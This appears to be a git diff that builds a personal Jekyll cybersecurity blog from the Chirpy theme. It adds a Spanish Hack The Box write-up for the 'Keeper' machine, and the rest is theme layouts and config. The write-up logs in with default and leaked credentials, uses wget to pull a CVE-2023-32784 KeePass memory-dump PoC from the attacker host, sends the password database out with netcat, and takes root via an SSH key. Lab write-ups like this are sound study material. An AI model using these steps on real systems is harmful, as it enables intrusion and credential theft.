diff --git a/README.md b/README.md deleted file mode 100644 index bdcc8ae..0000000 --- a/README.md +++ /dev/null @@ -1,61 +0,0 @@ -# Chirpy Starter - -[![Gem Version](https://img.shields.io/gem/v/jekyll-theme-chirpy)][gem]  -[![GitHub license](https://img.shields.io/github/license/cotes2020/chirpy-starter.svg?color=blue)][mit] - -When installing the [**Chirpy**][chirpy] theme through [RubyGems.org][gem], Jekyll can only read files in the folders -`_data`, `_layouts`, `_includes`, `_sass` and `assets`, as well as a small part of options of the `_config.yml` file -from the theme's gem. If you have ever installed this theme gem, you can use the command -`bundle info --path jekyll-theme-chirpy` to locate these files. - -The Jekyll team claims that this is to leave the ball in the user’s court, but this also results in users not being -able to enjoy the out-of-the-box experience when using feature-rich themes. - -To fully use all the features of **Chirpy**, you need to copy the other critical files from the theme's gem to your -Jekyll site. The following is a list of targets: - -```shell -. -├── _config.yml -├── _plugins -├── _tabs -└── index.html -``` - -To save you time, and also in case you lose some files while copying, we extract those files/configurations of the -latest version of the **Chirpy** theme and the [CD][CD] workflow to here, so that you can start writing in minutes. - -## Prerequisites - -Follow the instructions in the [Jekyll Docs](https://jekyllrb.com/docs/installation/) to complete the installation of -the basic environment. [Git](https://git-scm.com/) also needs to be installed. - -## Installation - -Sign in to GitHub and [**use this template**][use-template] to generate a brand new repository and name it -`USERNAME.github.io`, where `USERNAME` represents your GitHub username. - -Then clone it to your local machine and run: - -```console -$ bundle -``` - -## Usage - -Please see the [theme's docs](https://github.com/cotes2020/jekyll-theme-chirpy#documentation). - -## Contributing - -The contents of this repository are automatically updated when new releases are made to the [main repository][chirpy]. -If you have problems using it, or would like to participate in improving it, please go to the main repository for feedback! - -## License - -This work is published under [MIT][mit] License. - -[gem]: https://rubygems.org/gems/jekyll-theme-chirpy -[chirpy]: https://github.com/cotes2020/jekyll-theme-chirpy/ -[use-template]: https://github.com/cotes2020/chirpy-starter/generate -[CD]: https://en.wikipedia.org/wiki/Continuous_deployment -[mit]: https://github.com/cotes2020/chirpy-starter/blob/master/LICENSE diff --git a/_config.yml b/_config.yml index 2e76174..c18d592 100644 --- a/_config.yml +++ b/_config.yml @@ -9,37 +9,37 @@ theme: jekyll-theme-chirpy lang: en # Change to your timezone › https://kevinnovak.github.io/Time-Zone-Picker -timezone: +timezone: America/New_York # jekyll-seo-tag settings › https://github.com/jekyll/jekyll-seo-tag/blob/master/docs/usage.md # ↓ -------------------------- -title: Chirpy # the main title +title: Litio7 # the main title -tagline: A text-focused Jekyll theme # it will display as the sub-title +tagline: Cyber Security Road Map # it will display as the sub-title description: >- # used by seo meta and the atom feed A minimal, responsive and feature-rich Jekyll theme for technical writing. # Fill in the protocol & hostname for your site. # e.g. 'https://username.github.io', note that it does not end with a '/'. -url: "" +url: "https://litio7.github.io" github: - username: github_username # change to your github username + username: Litio7 # change to your github username twitter: - username: twitter_username # change to your twitter username + username: # change to your twitter username social: # Change to your full name. # It will be displayed as the default author of the posts and the copyright owner in the Footer - name: your_full_name - email: example@domain.com # change to your email address + name: litio7 + email: # change to your email address links: # The first element serves as the copyright owner's link - - https://twitter.com/username # change to your twitter homepage - - https://github.com/username # change to your github homepage + # - https://twitter.com/username + - https://github.com/Litio7 # change to your github homepage # Uncomment below to add more social links # - https://www.facebook.com/username # - https://www.linkedin.com/in/username @@ -93,10 +93,10 @@ theme_mode: # [light | dark] # will be added to all media resources (site avatar, posts' images, audio and video files) paths starting with '/' # # e.g. 'https://cdn.com' -cdn: +# cdn: # the avatar on sidebar, support local or CORS resources -avatar: +avatar: /assets/img/laughing_man1.png # The URL of the site-wide social preview image used in SEO `og:image` meta tag. # It can be overridden by a customized `page.image` in front matter. diff --git a/_layouts/archives.html b/_layouts/archives.html new file mode 100644 index 0000000..4f7ad7d --- /dev/null +++ b/_layouts/archives.html @@ -0,0 +1,35 @@ +--- +layout: page +# The Archives of posts. +--- + +{% include lang.html %} + +{% assign df_strftime_m = site.data.locales[lang].df.archives.strftime | default: '/ %m' %} +{% assign df_dayjs_m = site.data.locales[lang].df.archives.dayjs | default: '/ MM' %} + +
+ {% for post in site.posts %} + {% assign cur_year = post.date | date: '%Y' %} + + {% if cur_year != last_year %} + {% unless forloop.first %}{% endunless %} + + + {{ '{% endif %} + {% endfor %} +
diff --git a/_layouts/categories.html b/_layouts/categories.html new file mode 100644 index 0000000..0515097 --- /dev/null +++ b/_layouts/categories.html @@ -0,0 +1,138 @@ +--- +layout: page +# All the Categories of posts +--- + +{% include lang.html %} + +{% assign HEAD_PREFIX = 'h_' %} +{% assign LIST_PREFIX = 'l_' %} + +{% assign group_index = 0 %} + +{% assign sort_categories = site.categories | sort %} + +{% for category in sort_categories %} + {% assign category_name = category | first %} + {% assign posts_of_category = category | last %} + {% assign first_post = posts_of_category | first %} + + {% if category_name == first_post.categories[0] %} + {% assign sub_categories = '' | split: '' %} + + {% for post in posts_of_category %} + {% assign second_category = post.categories[1] %} + {% if second_category %} + {% unless sub_categories contains second_category %} + {% assign sub_categories = sub_categories | push: second_category %} + {% endunless %} + {% endif %} + {% endfor %} + + {% assign sub_categories = sub_categories | sort %} + {% assign sub_categories_size = sub_categories | size %} + +
+ +
+ + + + {% capture _category_url %}/categories/{{ category_name | slugify | url_encode }}/{% endcapture %} + {{ category_name }} + + + {% assign top_posts_size = site.categories[category_name] | size %} + + {% if sub_categories_size > 0 %} + {{ sub_categories_size }} + {% if sub_categories_size > 1 %} + {{ + site.data.locales[lang].categories.category_measure.plural + | default: site.data.locales[lang].categories.category_measure + }} + {% else %} + {{ + site.data.locales[lang].categories.category_measure.singular + | default: site.data.locales[lang].categories.category_measure + }} + {% endif -%} + , + {% endif %} + + {{ top_posts_size }} + + {% if top_posts_size > 1 %} + {{ + site.data.locales[lang].categories.post_measure.plural + | default: site.data.locales[lang].categories.post_measure + }} + {% else %} + {{ + site.data.locales[lang].categories.post_measure.singular + | default: site.data.locales[lang].categories.post_measure + }} + {% endif %} + + + + + {% if sub_categories_size > 0 %} + + + + {% else %} + + + + {% endif %} +
+ + + + {% if sub_categories_size > 0 %} +
+ +
+ {% endif %} +
+ + + {% assign group_index = group_index | plus: 1 %} + {% endif %} +{% endfor %} diff --git a/_layouts/category.html b/_layouts/category.html new file mode 100644 index 0000000..b064f27 --- /dev/null +++ b/_layouts/category.html @@ -0,0 +1,24 @@ +--- +layout: page +# The Category layout +--- + +{% include lang.html %} + +
+

+ + {{ page.title }} + {{ page.posts | size }} +

+ + +
diff --git a/_layouts/compress.html b/_layouts/compress.html new file mode 100644 index 0000000..2779e92 --- /dev/null +++ b/_layouts/compress.html @@ -0,0 +1,10 @@ +--- +# Jekyll layout that compresses HTML +# v3.2.0 +# http://jch.penibelst.de/ +# © 2014–2015 Anatol Broder +# MIT License +--- + +{% capture _LINE_FEED %} +{% endcapture %}{% if site.compress_html.ignore.envs contains jekyll.environment or site.compress_html.ignore.envs == "all" or page.compress_html == false %}{{ content }}{% else %}{% capture _content %}{{ content }}{% endcapture %}{% assign _profile = site.compress_html.profile %}{% if site.compress_html.endings == "all" %}{% assign _endings = "html head body li dt dd optgroup option colgroup caption thead tbody tfoot tr td th" | split: " " %}{% else %}{% assign _endings = site.compress_html.endings %}{% endif %}{% for _element in _endings %}{% capture _end %}{% endcapture %}{% assign _content = _content | remove: _end %}{% endfor %}{% if _profile and _endings %}{% assign _profile_endings = _content | size | plus: 1 %}{% endif %}{% for _element in site.compress_html.startings %}{% capture _start %}<{{ _element }}>{% endcapture %}{% assign _content = _content | remove: _start %}{% endfor %}{% if _profile and site.compress_html.startings %}{% assign _profile_startings = _content | size | plus: 1 %}{% endif %}{% if site.compress_html.comments == "all" %}{% assign _comments = "" | split: " " %}{% else %}{% assign _comments = site.compress_html.comments %}{% endif %}{% if _comments.size == 2 %}{% capture _comment_befores %}.{{ _content }}{% endcapture %}{% assign _comment_befores = _comment_befores | split: _comments.first %}{% for _comment_before in _comment_befores %}{% if forloop.first %}{% continue %}{% endif %}{% capture _comment_outside %}{% if _carry %}{{ _comments.first }}{% endif %}{{ _comment_before }}{% endcapture %}{% capture _comment %}{% unless _carry %}{{ _comments.first }}{% endunless %}{{ _comment_outside | split: _comments.last | first }}{% if _comment_outside contains _comments.last %}{{ _comments.last }}{% assign _carry = false %}{% else %}{% assign _carry = true %}{% endif %}{% endcapture %}{% assign _content = _content | remove_first: _comment %}{% endfor %}{% if _profile %}{% assign _profile_comments = _content | size | plus: 1 %}{% endif %}{% endif %}{% assign _pre_befores = _content | split: "" %}{% assign _pres_after = "" %}{% if _pres.size != 0 %}{% if site.compress_html.blanklines %}{% assign _lines = _pres.last | split: _LINE_FEED %}{% capture _pres_after %}{% for _line in _lines %}{% assign _trimmed = _line | split: " " | join: " " %}{% if _trimmed != empty or forloop.last %}{% unless forloop.first %}{{ _LINE_FEED }}{% endunless %}{{ _line }}{% endif %}{% endfor %}{% endcapture %}{% else %}{% assign _pres_after = _pres.last | split: " " | join: " " %}{% endif %}{% endif %}{% capture _content %}{{ _content }}{% if _pre_before contains "" %}{% endif %}{% unless _pre_before contains "" and _pres.size == 1 %}{{ _pres_after }}{% endunless %}{% endcapture %}{% endfor %}{% if _profile %}{% assign _profile_collapse = _content | size | plus: 1 %}{% endif %}{% if site.compress_html.clippings == "all" %}{% assign _clippings = "html head title base link meta style body article section nav aside h1 h2 h3 h4 h5 h6 hgroup header footer address p hr blockquote ol ul li dl dt dd figure figcaption main div table caption colgroup col tbody thead tfoot tr td th" | split: " " %}{% else %}{% assign _clippings = site.compress_html.clippings %}{% endif %}{% for _element in _clippings %}{% assign _edges = " ;; ;" | replace: "e", _element | split: ";" %}{% assign _content = _content | replace: _edges[0], _edges[1] | replace: _edges[2], _edges[3] | replace: _edges[4], _edges[5] %}{% endfor %}{% if _profile and _clippings %}{% assign _profile_clippings = _content | size | plus: 1 %}{% endif %}{{ _content }}{% if _profile %}
Step Bytes
raw {{ content | size }}{% if _profile_endings %}
endings {{ _profile_endings }}{% endif %}{% if _profile_startings %}
startings {{ _profile_startings }}{% endif %}{% if _profile_comments %}
comments {{ _profile_comments }}{% endif %}{% if _profile_collapse %}
collapse {{ _profile_collapse }}{% endif %}{% if _profile_clippings %}
clippings {{ _profile_clippings }}{% endif %}
{% endif %}{% endif %} diff --git a/_layouts/default.html b/_layouts/default.html new file mode 100644 index 0000000..ea438fe --- /dev/null +++ b/_layouts/default.html @@ -0,0 +1,82 @@ +--- +layout: compress +--- + + + +{% include origin-type.html %} + +{% include lang.html %} + +{% if site.theme_mode %} + {% capture prefer_mode %}data-mode="{{ site.theme_mode }}"{% endcapture %} +{% endif %} + + + + {% include head.html %} + + + {% include sidebar.html lang=lang %} + +
+
+ {% include topbar.html lang=lang %} + +
+
+ {% if layout.refactor or layout.layout == 'default' %} + {% include refactor-content.html content=content lang=lang %} + {% else %} + {{ content }} + {% endif %} +
+ + + +
+ +
+ +
+ {% for _include in layout.tail_includes %} + {% assign _include_path = _include | append: '.html' %} + {% include {{ _include_path }} lang=lang %} + {% endfor %} + + {% include_cached footer.html lang=lang %} +
+
+ + {% include_cached search-results.html lang=lang %} +
+ + +
+ +
+ + {% if site.pwa.enabled %} + {% include_cached notification.html lang=lang %} + {% endif %} + + + {% include js-selector.html lang=lang %} + + {% include_cached search-loader.html lang=lang %} + + diff --git a/_layouts/home.html b/_layouts/home.html new file mode 100644 index 0000000..e44efe8 --- /dev/null +++ b/_layouts/home.html @@ -0,0 +1,115 @@ +--- +layout: default +refactor: true +--- + +{% include lang.html %} + +{% assign pinned = site.posts | where: 'pin', 'true' %} +{% assign default = site.posts | where_exp: 'item', 'item.pin != true and item.hidden != true' %} + +{% assign posts = '' | split: '' %} + + + +{% assign offset = paginator.page | minus: 1 | times: paginator.per_page %} +{% assign pinned_num = pinned.size | minus: offset %} + +{% if pinned_num > 0 %} + {% for i in (offset..pinned.size) limit: pinned_num %} + {% assign posts = posts | push: pinned[i] %} + {% endfor %} +{% else %} + {% assign pinned_num = 0 %} +{% endif %} + + + +{% assign default_beg = offset | minus: pinned.size %} + +{% if default_beg < 0 %} + {% assign default_beg = 0 %} +{% endif %} + +{% assign default_num = paginator.posts | size | minus: pinned_num %} +{% assign default_end = default_beg | plus: default_num | minus: 1 %} + +{% if default_num > 0 %} + {% for i in (default_beg..default_end) %} + {% assign posts = posts | push: default[i] %} + {% endfor %} +{% endif %} + +
+ {% for post in posts %} +
+ + {% assign card_body_col = '12' %} + + {% if post.image %} + {% assign src = post.image.path | default: post.image %} + {% unless src contains '//' %} + {% assign src = post.media_subpath | append: '/' | append: src | replace: '//', '/' %} + {% endunless %} + + {% assign alt = post.image.alt | xml_escape | default: 'Preview Image' %} + + {% assign lqip = null %} + + {% if post.image.lqip %} + {% capture lqip %}lqip="{{ post.image.lqip }}"{% endcapture %} + {% endif %} + +
+ {{ alt }} +
+ + {% assign card_body_col = '7' %} + {% endif %} + +
+
+

{{ post.title }}

+ +
+

{% include post-description.html %}

+
+ +
+
+ + + {% include datetime.html date=post.date lang=lang %} + + + {% if post.categories.size > 0 %} + + + {% for category in post.categories %} + {{ category }} + {%- unless forloop.last -%},{%- endunless -%} + {% endfor %} + + {% endif %} +
+ + {% if post.pin %} +
+ + {{ site.data.locales[lang].post.pin_prompt }} +
+ {% endif %} +
+ +
+ +
+ +
+ {% endfor %} +
+ + +{% if paginator.total_pages > 1 %} + {% include post-paginator.html %} +{% endif %} diff --git a/_layouts/page.html b/_layouts/page.html new file mode 100644 index 0000000..32d6582 --- /dev/null +++ b/_layouts/page.html @@ -0,0 +1,20 @@ +--- +layout: default +--- + +{% include lang.html %} + +
+ {% if page.layout == 'page' or page.collection == 'tabs' %} + {% assign tab_key = page.title | downcase %} + {% assign title = site.data.locales[lang].tabs[tab_key] | default: page.title %} +

+ {{ title }} +

+
+ {{ content }} +
+ {% else %} + {{ content }} + {% endif %} +
diff --git a/_layouts/post.html b/_layouts/post.html new file mode 100644 index 0000000..f17ceea --- /dev/null +++ b/_layouts/post.html @@ -0,0 +1,152 @@ +--- +layout: default +refactor: true +panel_includes: + - toc +tail_includes: + - related-posts + - post-nav + - comments +--- + +{% include lang.html %} + +
+
+

{{ page.title }}

+ {% if page.description %} +

{{ page.description }}

+ {% endif %} + +
+ + + {{ site.data.locales[lang].post.posted }} + {% include datetime.html date=page.date tooltip=true lang=lang %} + + + + {% if page.last_modified_at and page.last_modified_at != page.date %} + + {{ site.data.locales[lang].post.updated }} + {% include datetime.html date=page.last_modified_at tooltip=true lang=lang %} + + {% endif %} + + {% if page.image %} + {% capture src %}src="{{ page.image.path | default: page.image }}"{% endcapture %} + {% capture class %}class="preview-img{% if page.image.no_bg %}{{ ' no-bg' }}{% endif %}"{% endcapture %} + {% capture alt %}alt="{{ page.image.alt | xml_escape | default: "Preview Image" }}"{% endcapture %} + + {% if page.image.lqip %} + {%- capture lqip -%}lqip="{{ page.image.lqip }}"{%- endcapture -%} + {% endif %} + +
+ + {%- if page.image.alt -%} +
{{ page.image.alt }}
+ {%- endif -%} +
+ {% endif %} + +
+ + + {% if page.author %} + {% assign authors = page.author %} + {% elsif page.authors %} + {% assign authors = page.authors %} + {% endif %} + + {{ site.data.locales[lang].post.written_by }} + + + {% if authors %} + {% for author in authors %} + {% if site.data.authors[author].url -%} + {{ site.data.authors[author].name }} + {%- else -%} + {{ site.data.authors[author].name }} + {%- endif %} + {% unless forloop.last %}{{ ', ' }}{% endunless %} + {% endfor %} + {% else %} + {{ site.social.name }} + {% endif %} + + + +
+ + {% if site.pageviews.provider and site.analytics[site.pageviews.provider].id %} + + + + + {{ site.data.locales[lang].post.pageview_measure }} + + {% endif %} + + + {% include read-time.html content=content prompt=true lang=lang %} +
+
+
+
+ +
+ {{ content }} +
+ +
+ + {% if page.categories.size > 0 %} +
+ + {% for category in page.categories %} + {{ category }} + {%- unless forloop.last -%},{%- endunless -%} + {% endfor %} +
+ {% endif %} + + + {% if page.tags.size > 0 %} +
+ + {% for tag in page.tags %} + + {{- tag -}} + + {% endfor %} +
+ {% endif %} + +
+
+ {% if site.data.locales[lang].copyright.license.template %} + {% capture _replacement %} + + {{ site.data.locales[lang].copyright.license.name }} + + {% endcapture %} + + {{ site.data.locales[lang].copyright.license.template | replace: ':LICENSE_NAME', _replacement }} + {% endif %} +
+ + {% include post-sharing.html lang=lang %} +
+ +
+ +
diff --git a/_layouts/tag.html b/_layouts/tag.html new file mode 100644 index 0000000..d766d09 --- /dev/null +++ b/_layouts/tag.html @@ -0,0 +1,23 @@ +--- +layout: page +# The layout for Tag page +--- + +{% include lang.html %} + +
+

+ + {{ page.title }} + {{ page.posts | size }} +

+
    + {% for post in page.posts %} +
  • + {{ post.title }} + + {% include datetime.html date=post.date class='text-muted small text-nowrap' lang=lang %} +
    • + {% endfor %} +
+
diff --git a/_layouts/tags.html b/_layouts/tags.html new file mode 100644 index 0000000..7800ca0 --- /dev/null +++ b/_layouts/tags.html @@ -0,0 +1,22 @@ +--- +layout: page +# All the Tags of posts. +--- + +
+ {% assign tags = '' | split: '' %} + {% for t in site.tags %} + {% assign tags = tags | push: t[0] %} + {% endfor %} + + {% assign sorted_tags = tags | sort_natural %} + + {% for t in sorted_tags %} +
+ + {{ t -}} + {{ site.tags[t].size }} + +
+ {% endfor %} +
diff --git a/_posts/2024-08-08-htb-writeup-keeper.md b/_posts/2024-08-08-htb-writeup-keeper.md new file mode 100644 index 0000000..6525a84 --- /dev/null +++ b/_posts/2024-08-08-htb-writeup-keeper.md @@ -0,0 +1,129 @@ +--- +title: Keeper +description: Keeper es una máquina de dificultad fácil en Linux que presenta un sistema de gestión de tickets de soporte con credenciales por defecto. Al enumerar el servicio, se pueden encontrar credenciales en texto claro que permiten el acceso a SSH. Con acceso a SSH, se puede obtener un volcado de la base de datos de KeePass, lo cual permite recuperar la contraseña maestra. Una vez con acceso a la base de datos de KeePass, se obtienen las claves SSH de root, que permiten obtener una shell con privilegios en el host. +date: 2023-08-12 +toc: true +pin: true +image: + path: /assets/img/htb-writeup-keeper/keeper_logo.png +categories: + - Machines +tags: + - htb + - linux + - osint + - cve +--- +## Information Gathering + +```terminal +/home/kali/Documents/htb/machines/keeper:-$ sudo nmap -sCV 10.10.11.227 -n -Pn -oN map1 +``` + +![](/assets/img/htb-writeup-keeper/keeper2.png) + +--- +## Web Analysis & Osint + +![](/assets/img/htb-writeup-keeper/keeper3.png) + +```terminal +/home/kali/Documents/htb/machines/keeper:-$ echo "10.10.11.227\tkeeper.htb\ttiquets.keeper.htb" | sudo tee -a /etc/hosts +``` + +![](/assets/img/htb-writeup-keeper/keeper4.png) + +Busco las credenciales por defecto del servicio '4.4.4+dfsg-2ubuntu1'. + + +>"Be sure to change the password for the 'root' user of RT. The default password is 'password'. This can be changed via the RT web interface at: Preferences > About me" + +![](/assets/img/htb-writeup-keeper/keeper5.png) + +Encuentro 2 usuarios registrados en el sistema. Y en el usuario 'lnorgaard' encuentro la contraseña 'Welcome2023!'. + +![](/assets/img/htb-writeup-keeper/keeper6.png) + +![](/assets/img/htb-writeup-keeper/keeper7.png) + +```terminal +/home/kali/Documents/htb/machines/keeper:-$ ssh lnorgaard@10.10.11.227 +lnorgaard@10.10.11.227's password: Welcome2023! +lnorgaard@keeper:~$ ls + RT30000.zip user.txt +``` +--- +## Privilege Escalation & CVE Exploitation + +```terminal +lnorgaard@keeper:~$ unzip RT30000.zip + Archive: RT30000.zip + inflating: KeePassDumpFull.dmp + extracting: passcodes.kdbx +``` + + + +El archivo 'KeePassDumpFull.dmp' es un volcado de memoria o 'dump' de un proceso de KeePass. La Vulnerabilidad CVE-2023-32784 permite recuperar la contraseña maestra en texto claro a partir de un volcado de memoria, incluso si la base de datos de KeePass está bloqueada o el proceso de KeePass ya no está en ejecución. + +Existe un Proof of Concept en github precisamente para esto. +Una vez clonado el PoC, monto un servidor para exportarlo a la maquina victima. + +```terminal +/home/kali/Documents/htb/machines/keeper:-$ sudo git clone https://github.com/CMEPW/keepass-dump-masterkey.git + +/home/kali/Documents/htb/machines/keeper:-$ python3 -m http.server + +lnorgaard@keeper:~$ wget http://10.10.15.26:8000/poc.py +``` + +Al explotar el CVE, la primera letra de la contraseña no se recupera. + +```terminal +lnorgaard@keeper:~$ python3 poc.py -d KeePassDumpFull.dmp +``` + +![](/assets/img/htb-writeup-keeper/keeper9.png) + +Realizo una busqueda del resultado '●,dgr●d med fl●d' y encuentro una palabra en danes que coincide 'rødgrød med fløde'. + +Importo 'keepass.kdbx' con Netcat. E instalo Keepass para abrir el archivo anterior. + +```terminal +/home/kali/Documents/htb/machines/keeper:-$ nc -nlvp 1234 > keepass.kdbx + listening on any 1234 ... + +lnorgaard@keeper:~$ nc 10.10.15.26 1234 < passcodes.kdbx + nc 10.10.15.26 1234 < passcodes.kdbx + + ... connect to [10.10.15.26] from (UNKNOWN) [10.10.11.227] 60582 + +/home/kali/Documents/htb/machines/keeper:-$ sudo apt install keepass2 + +/home/kali/Documents/htb/machines/keeper:-$ keepass2 keepass.kdbx +``` + +![](/assets/img/htb-writeup-keeper/keeper10.png) + +![](/assets/img/htb-writeup-keeper/keeper11.png) + +![](/assets/img/htb-writeup-keeper/keeper12.png) + + Copio y guardo la clave 'PuTTY' en un archivo '.ppk'. + +```terminal +/home/kali/Documents/htb/machines/keeper:-$ echo 'PuTTY-User-Key-File-3.md: ssh-rsa Encrypt…' > key.ppk +``` +Para conviertir la clave privada del archivo '.ppk' a un formato '.pem' que OpenSSH puede utilizar, descargo la herramienta Putty-Tools. + +```terminal +/home/kali/Documents/htb/machines/keeper:-$ sudo apt install putty-tools + +/home/kali/Documents/htb/machines/keeper:-$ puttygen key.ppk -O private-openssh -o key.pem + +/home/kali/Documents/htb/machines/keeper:-$ chmod 600 key.pem + +/home/kali/Documents/htb/machines/keeper:-$ ssh -i key.pem root@10.10.11.227 + +root@keeper:~# cat root.txt +``` diff --git a/_tabs/about.md b/_tabs/about.md index ddb2bc4..6b9c5df 100644 --- a/_tabs/about.md +++ b/_tabs/about.md @@ -4,5 +4,8 @@ icon: fas fa-info-circle order: 4 --- -> Add Markdown syntax content to file `_tabs/about.md`{: .filepath } and it will show up on this page. +> Un espacio personal diseñado para registrar y mostrar mi progreso en la resolución de desafíos de hacking y otros ejercicios de seguridad informática. Cada writeup es una reflexión sobre el proceso de resolución, las herramientas utilizadas y las lecciones aprendidas. Estos documentos están pensados para ofrecer una visión clara y útil de cómo he solucionado cada desafío, facilitando así el aprendizaje y la autoevaluación. +{: .prompt-tip } + +> A personal space designed to document and showcase my progress in solving hacking challenges and other cybersecurity exercises. Each writeup is a reflection on the problem-solving process, the tools used, and the lessons learned. These documents are intended to provide a clear and useful insight into how I have solved each challenge, thus facilitating learning and self-assessment. {: .prompt-tip } diff --git a/assets/404.html b/assets/404.html new file mode 100644 index 0000000..af89d6d --- /dev/null +++ b/assets/404.html @@ -0,0 +1,14 @@ +--- +layout: page +title: "404: Page not found" +permalink: /404.html + +redirect_from: + - /norobots/ + - /assets/ + - /posts/ +--- + +{% include lang.html %} + +

{{ site.data.locales[lang].not_found.statement }}

diff --git a/assets/css/jekyll-theme-chirpy.scss b/assets/css/jekyll-theme-chirpy.scss new file mode 100644 index 0000000..d20545b --- /dev/null +++ b/assets/css/jekyll-theme-chirpy.scss @@ -0,0 +1,10 @@ +--- +--- + +@import 'main +{%- if jekyll.environment == 'production' -%} + .bundle +{%- endif -%} +'; + +/* append your custom style below */ diff --git a/assets/feed.xml b/assets/feed.xml new file mode 100644 index 0000000..0ab20e3 --- /dev/null +++ b/assets/feed.xml @@ -0,0 +1,54 @@ +--- +layout: compress +permalink: /feed.xml +# Atom Feed, reference: https://validator.w3.org/feed/docs/atom.html +--- + +{% capture source %} + + {{ "/" | absolute_url }} + {{ site.title }} + {{ site.description }} + {{ site.time | date_to_xmlschema }} + + {{ site.social.name }} + {{ "/" | absolute_url }} + + + + Jekyll + © {{ 'now' | date: '%Y' }} {{ site.social.name }} + {{ site.baseurl }}/assets/img/favicons/favicon.ico + {{ site.baseurl }}/assets/img/favicons/favicon-96x96.png + +{% for post in site.posts limit: 5 %} + {% assign post_absolute_url = post.url | absolute_url %} + + {{ post.title }} + + {{ post.date | date_to_xmlschema }} + {% if post.last_modified_at %} + {{ post.last_modified_at | date_to_xmlschema }} + {% else %} + {{ post.date | date_to_xmlschema }} + {% endif %} + {{ post_absolute_url }} + + + {{ post.author | default: site.social.name }} + + + {% if post.categories %} + {% for category in post.categories %} + + {% endfor %} + {% endif %} + + {% include post-description.html max_length=400 %} + + +{% endfor %} + +{% endcapture %} +{{ source | replace: '&', '&' }} diff --git a/assets/img/favicons/android-chrome-192x192.png b/assets/img/favicons/android-chrome-192x192.png new file mode 100644 index 0000000..c6a5ad1 Binary files /dev/null and b/assets/img/favicons/android-chrome-192x192.png differ diff --git a/assets/img/favicons/android-chrome-512x512.png b/assets/img/favicons/android-chrome-512x512.png new file mode 100644 index 0000000..a9bcb18 Binary files /dev/null and b/assets/img/favicons/android-chrome-512x512.png differ diff --git a/assets/img/favicons/apple-touch-icon.png b/assets/img/favicons/apple-touch-icon.png new file mode 100644 index 0000000..a3264a8 Binary files /dev/null and b/assets/img/favicons/apple-touch-icon.png differ diff --git a/assets/img/favicons/favicon-16x16.png b/assets/img/favicons/favicon-16x16.png new file mode 100644 index 0000000..068b582 Binary files /dev/null and b/assets/img/favicons/favicon-16x16.png differ diff --git a/assets/img/favicons/favicon-32x32.png b/assets/img/favicons/favicon-32x32.png new file mode 100644 index 0000000..5f4b3da Binary files /dev/null and b/assets/img/favicons/favicon-32x32.png differ diff --git a/assets/img/favicons/favicon.ico b/assets/img/favicons/favicon.ico new file mode 100644 index 0000000..e5d48cd Binary files /dev/null and b/assets/img/favicons/favicon.ico differ diff --git a/assets/img/favicons/mstile-150x150.png b/assets/img/favicons/mstile-150x150.png new file mode 100644 index 0000000..e367c7d Binary files /dev/null and b/assets/img/favicons/mstile-150x150.png differ diff --git a/assets/img/favicons/safari-pinned-tab.svg b/assets/img/favicons/safari-pinned-tab.svg new file mode 100644 index 0000000..a431f71 --- /dev/null +++ b/assets/img/favicons/safari-pinned-tab.svg @@ -0,0 +1,236 @@ + + + + +Created by potrace 1.14, written by Peter Selinger 2001-2017 + + + + + + + + diff --git a/assets/img/htb-writeup-keeper/keeper10.png b/assets/img/htb-writeup-keeper/keeper10.png new file mode 100644 index 0000000..b0a4863 Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper10.png differ diff --git a/assets/img/htb-writeup-keeper/keeper11.png b/assets/img/htb-writeup-keeper/keeper11.png new file mode 100644 index 0000000..4d3bf28 Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper11.png differ diff --git a/assets/img/htb-writeup-keeper/keeper12.png b/assets/img/htb-writeup-keeper/keeper12.png new file mode 100644 index 0000000..c7c9731 Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper12.png differ diff --git a/assets/img/htb-writeup-keeper/keeper2.png b/assets/img/htb-writeup-keeper/keeper2.png new file mode 100644 index 0000000..4367cea Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper2.png differ diff --git a/assets/img/htb-writeup-keeper/keeper3.png b/assets/img/htb-writeup-keeper/keeper3.png new file mode 100644 index 0000000..2f30e2b Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper3.png differ diff --git a/assets/img/htb-writeup-keeper/keeper4.png b/assets/img/htb-writeup-keeper/keeper4.png new file mode 100644 index 0000000..12b2596 Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper4.png differ diff --git a/assets/img/htb-writeup-keeper/keeper5.png b/assets/img/htb-writeup-keeper/keeper5.png new file mode 100644 index 0000000..17b6e02 Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper5.png differ diff --git a/assets/img/htb-writeup-keeper/keeper6.png b/assets/img/htb-writeup-keeper/keeper6.png new file mode 100644 index 0000000..271ffca Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper6.png differ diff --git a/assets/img/htb-writeup-keeper/keeper7.png b/assets/img/htb-writeup-keeper/keeper7.png new file mode 100644 index 0000000..f1778af Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper7.png differ diff --git a/assets/img/htb-writeup-keeper/keeper8.png b/assets/img/htb-writeup-keeper/keeper8.png new file mode 100644 index 0000000..79906d6 Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper8.png differ diff --git a/assets/img/htb-writeup-keeper/keeper9.png b/assets/img/htb-writeup-keeper/keeper9.png new file mode 100644 index 0000000..62e6401 Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper9.png differ diff --git a/assets/img/htb-writeup-keeper/keeper_logo.png b/assets/img/htb-writeup-keeper/keeper_logo.png new file mode 100644 index 0000000..a0bbea6 Binary files /dev/null and b/assets/img/htb-writeup-keeper/keeper_logo.png differ diff --git a/assets/img/laughing_man1.png b/assets/img/laughing_man1.png new file mode 100644 index 0000000..1083419 Binary files /dev/null and b/assets/img/laughing_man1.png differ diff --git a/assets/js/data/mathjax.js b/assets/js/data/mathjax.js new file mode 100644 index 0000000..ca3d0de --- /dev/null +++ b/assets/js/data/mathjax.js @@ -0,0 +1,25 @@ +--- +layout: compress +# WARNING: Don't use '//' to comment out code, use '{% comment %}' and '{% endcomment %}' instead. +--- + +{%- comment -%} + See: +{%- endcomment -%} + +MathJax = { + tex: { + {%- comment -%} start/end delimiter pairs for in-line math {%- endcomment -%} + inlineMath: [ + ['$', '$'], + ['\\(', '\\)'] + ], + {%- comment -%} start/end delimiter pairs for display math {%- endcomment -%} + displayMath: [ + ['$$', '$$'], + ['\\[', '\\]'] + ], + {%- comment -%} equation numbering {%- endcomment -%} + tags: 'ams' + } +}; diff --git 